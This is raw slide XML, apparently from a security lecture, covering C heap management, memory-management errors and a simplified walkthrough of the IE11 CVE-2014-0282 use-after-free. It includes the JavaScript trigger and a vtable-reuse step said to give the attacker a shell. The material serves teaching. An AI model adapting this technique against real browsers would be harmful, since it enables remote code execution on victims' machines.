          <a:xfrm>
            <a:off x="7986712" y="4930778"/>
            <a:ext cx="1524000" cy="8382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F347FE3-7314-F941-8848-A29E3AAF79FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4329112" y="4919665"/>
            <a:ext cx="1066800" cy="8382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8EECBBC-B91B-DC4C-9C7E-C77CD0855859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7948613" y="5948366"/>
            <a:ext cx="381000" cy="3175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E26D9FA-3C67-324F-8001-A27F78D46403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4481512" y="6138865"/>
            <a:ext cx="3657600" cy="1588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832E925-24E8-704B-9482-60988CD79B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4291013" y="5948366"/>
            <a:ext cx="381000" cy="3175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86F6B3D-CED9-F54E-925B-CA126DC49C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163860" y="3643052"/>
            <a:ext cx="22235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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Suppose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> is on the heap next to a string object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579D867-601A-E849-937C-FC2F64C23E0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="4905368"/>
            <a:ext cx="2590800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000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F68E3C9-DDE3-1D48-9D5F-1A9262707291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4479925" y="4056859"/>
            <a:ext cx="4649787" cy="11437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40502F5-C83D-5944-8283-310D5D7DC343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9160397" y="3590135"/>
            <a:ext cx="983976" cy="929723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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell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44CEB8A9-FF2A-B74C-BF1F-D27467ED8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612" y="1922647"/>
            <a:ext cx="8229600" cy="1037165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Compiler-generated function pointers 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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>(e.g., virtual method table in C++ or JavaScript code)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="991878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Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56EB6B44-061E-7545-A382-67DBEA25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Dynamic Memory Management in C</a:t>
            </a:r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EB6D35F1-7C53-594D-A71B-348E3BDAE1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Memory allocation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> n)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Allocates n bytes and returns a pointer to the allocated memory; memory not cleared</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>calloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>realloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Memory deallocation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>free(void * p)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Frees the memory space pointed to by p, which must have been returned by a previous call to malloc(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>calloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(), or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>realloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>If free(p) has already been called before, undefined behavior occurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>If p is NULL, no operation is performed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13D93E-2570-F04B-AA32-610D116B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4475" y="4686300"/>
            <a:ext cx="7386638" cy="3429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393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515240BB-3EBF-3E43-9665-A20C856E41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Memory Management Errors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E6EDADD4-E127-534B-B935-78A4219FE9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6762750" cy="4254818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Initialization errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Failing to check return values </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Writing to already freed memory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Freeing the same memory more than once </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Improperly paired memory management functions (example: malloc / delete)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Failure to distinguish scalars and arrays </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Improper use of allocation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91AAE0-07C6-724F-9999-673A93E56959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8172450" y="2014194"/>
            <a:ext cx="2821780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buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All result in exploitable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34212602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08088" y="1814201"/>
            <a:ext cx="82169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&lt;form id="form"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>   &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> id="c1" name="a1" &gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>textarea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&lt;input      id="c2" type="text" name="a2” value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>    function changer() {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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("form").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = ""; 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CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>();           // erase  c1 and c2 fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>    } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("c1").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onpropertychange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = changer; 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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("form").reset(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&lt;/script&gt;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382741" y="2921168"/>
            <a:ext cx="4423395" cy="2894645"/>
            <a:chOff x="5422900" y="1749593"/>
            <a:chExt cx="5010030" cy="2894645"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7304296" y="1749593"/>
              <a:ext cx="3128634" cy="1015663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Loop on form elements:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>      c1.doReset() </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>      c2.doReset() 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5422900" y="2832100"/>
              <a:ext cx="2605103" cy="1812138"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2605103"/>
                <a:gd name="connsiteY0" fmla="*/ 1739900 h 1812138"/>
                <a:gd name="connsiteX1" fmla="*/ 1955800 w 2605103"/>
                <a:gd name="connsiteY1" fmla="*/ 1752600 h 1812138"/>
                <a:gd name="connsiteX2" fmla="*/ 2540000 w 2605103"/>
                <a:gd name="connsiteY2" fmla="*/ 1092200 h 1812138"/>
                <a:gd name="connsiteX3" fmla="*/ 2590800 w 2605103"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 181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5103" h="1812138">
                  <a:moveTo>
                    <a:pt x="0" y="1739900"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="766233" y="1800225"/>
                    <a:pt x="1532467" y="1860550"/>
                    <a:pt x="1955800" y="1752600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2379133" y="1644650"/>
                    <a:pt x="2434167" y="1384300"/>
                    <a:pt x="2540000" y="1092200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2645833" y="800100"/>
                    <a:pt x="2590800" y="0"/>
                    <a:pt x="2590800" y="0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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264D74BE-9661-5C4B-B979-D0CD902F92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altLang="en-US" kern="0" dirty="0"/>
              <a:t>IE11 Example: CVE-2014-0282  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" kern="0" dirty="0"/>
              <a:t>(simplified)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428655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3614" y="2942928"/>
            <a:ext cx="6490434" cy="1357267"/>
            <a:chOff x="1366864" y="2128883"/>
            <a:chExt cx="6490434" cy="1357267"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1620892" y="2571750"/>
              <a:ext cx="838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vptr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620892" y="2800350"/>
              <a:ext cx="838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620892" y="3028950"/>
              <a:ext cx="838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620892" y="3257550"/>
              <a:ext cx="838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66864" y="2128883"/>
              <a:ext cx="1127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  c2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="3"/>
              <a:endCxn id="15" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2459092" y="2400300"/>
              <a:ext cx="1447800" cy="2857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3906892" y="2286000"/>
              <a:ext cx="838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FP1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906892" y="2514600"/>
              <a:ext cx="838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FP2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06892" y="2743200"/>
              <a:ext cx="838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FP3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55252" y="2957467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vtable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5" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4745092" y="2356366"/>
              <a:ext cx="990600" cy="439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735692" y="2171700"/>
              <a:ext cx="16695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doSomething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stCxn id="12" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4745092" y="2628900"/>
              <a:ext cx="990610" cy="353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735692" y="2479572"/>
              <a:ext cx="1088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doReset</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000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745092" y="2844129"/>
              <a:ext cx="990600" cy="9472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735692" y="2800350"/>
              <a:ext cx="21216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doSomethingElse</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="20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200150" y="2014194"/>
            <a:ext cx="6808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c1.doReset()  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>causes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>changer()  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to be called and free object c2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BF7B24-8CB1-BF4F-88CC-D910CCBF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After Free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C68864-FB2D-D140-ACA6-C0149439E809}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3825675" y="2386215"/>
              <a:ext cx="2138400" cy="2809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C68864-FB2D-D140-ACA6-C0149439E8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2675" y="2008575"/>
                <a:ext cx="2264040" cy="3565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44233FA-BCC6-6844-93AB-1B56D880917D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5907142" y="4733990"/>
            <a:ext cx="4151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Freed and marked as available for future allocations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14406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3614" y="2942928"/>
            <a:ext cx="3378228" cy="1357267"/>
            <a:chOff x="1366864" y="2128883"/>
            <a:chExt cx="3378228" cy="1357267"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1620892" y="2571750"/>
              <a:ext cx="838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vptr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620892" y="2800350"/>
              <a:ext cx="838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620892" y="3028950"/>
              <a:ext cx="838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620892" y="3257550"/>
              <a:ext cx="838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66864" y="2128883"/>
              <a:ext cx="1127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  c2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2459092" y="2400300"/>
              <a:ext cx="1447800" cy="2857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3906892" y="2286000"/>
              <a:ext cx="838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FP1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906892" y="2514600"/>
              <a:ext cx="838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FP2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06892" y="2743200"/>
              <a:ext cx="838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FP3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55252" y="2957467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vtable</a:t>
              </a:r>
              <a:endParaRPr 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200150" y="2014194"/>
            <a:ext cx="6808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c1.doReset()  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>causes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>changer()  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to be called and free object c2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BF7B24-8CB1-BF4F-88CC-D910CCBF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Just Happened?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B2B79D-D0A8-654E-949B-8F84C9E7239E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200150" y="4671113"/>
            <a:ext cx="5915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Suppose attacker allocates an object and gets the same memory that was previously occupied by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:endParaRPr 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DCE574-1320-5745-8377-D48E8FFBA213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200150" y="5470194"/>
            <a:ext cx="5161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When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c2.doReset() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is called, attacker gets shell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4051DC-55D5-4648-BAFB-3A30C6C44098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5432533" y="3434944"/>
            <a:ext cx="990610" cy="3533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8040952-867B-6445-B769-5AB99B3EBF68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6423133" y="3285616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ShellCode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40B716-D38B-244D-911C-3FA3839EAA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4573642" y="3128335"/>
            <a:ext cx="838200" cy="671467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="6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1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81765D0-C315-ED41-88D8-15CDB6F40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64" y="604494"/>
            <a:ext cx="9849510" cy="537720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DB3F56-0B35-204A-9D4E-CBDEF3C96D9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="4314514"/>
            <a:ext cx="7666924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171E24"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Their computer attacks used some of the world’s most destructive malware to date, including: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171E24"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>KillDisk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171E24"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171E24"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Industroyer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171E24"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>, which each caused blackouts in Ukraine; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171E24"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>NotPetya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171E24"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>, which caused nearly $1 billion in losses to the three victims identified in the indictment alone; and Olympic Destroyer, which disrupted thousands of computers used to support the 2018 PyeongChang Winter Olympics.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763DFD2-530E-EF48-80DF-CDC9A8F0AE36}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6755460" y="4877580"/>
              <a:ext cx="1438200" cy="660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763DFD2-530E-EF48-80DF-CDC9A8F0AE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19460" y="4841940"/>
                <a:ext cx="1509840" cy="7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57343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08088" y="1844638"/>
            <a:ext cx="82169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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>function changer() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(”form").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = ""; 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CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>        --- allocate string object to occupy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> location ---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>    } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("c1").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onpropertychange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = changer; 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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("form").reset(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;/script&gt;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56DDE6-BAF9-8B4A-8B91-2A1E40C9F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Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
